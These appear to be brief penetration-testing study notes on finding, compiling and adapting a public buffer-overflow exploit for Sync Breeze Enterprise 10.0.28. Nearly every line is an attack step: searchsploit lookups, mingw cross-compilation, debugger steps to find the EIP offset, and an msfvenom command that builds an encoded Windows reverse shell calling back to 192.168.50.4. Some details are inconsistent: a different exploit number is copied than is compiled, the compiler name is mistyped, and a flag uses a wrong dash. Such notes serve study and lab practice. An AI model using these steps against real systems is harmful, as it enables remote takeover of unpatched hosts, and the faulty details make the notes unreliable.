Finding an exploit for "Sync Breeze Enterprise 10.0.28"
searchsploit "Sync Breeze Enterprise 10.0.28"
searchsploit -m 47126 # copy in wd
#cross compilation of exploit code
1686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
#error of compilation, find params to fix
1686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
now we find that the module dll on which the exploit attaches is not present,
we need to find another
in windows client: Immunity Debugger (admin)
click on File > attach and select the syncbrs process
Once attached, we'll click on the View menu, then Executable modules
put a breakpoint in the address of the exploit, than launch the exploit and see the address for EIP/RIP when exploit is sent
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443
EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
#compile
sudo wine exploit.exe
if it is off by x bytes, just change the length of the buffer
--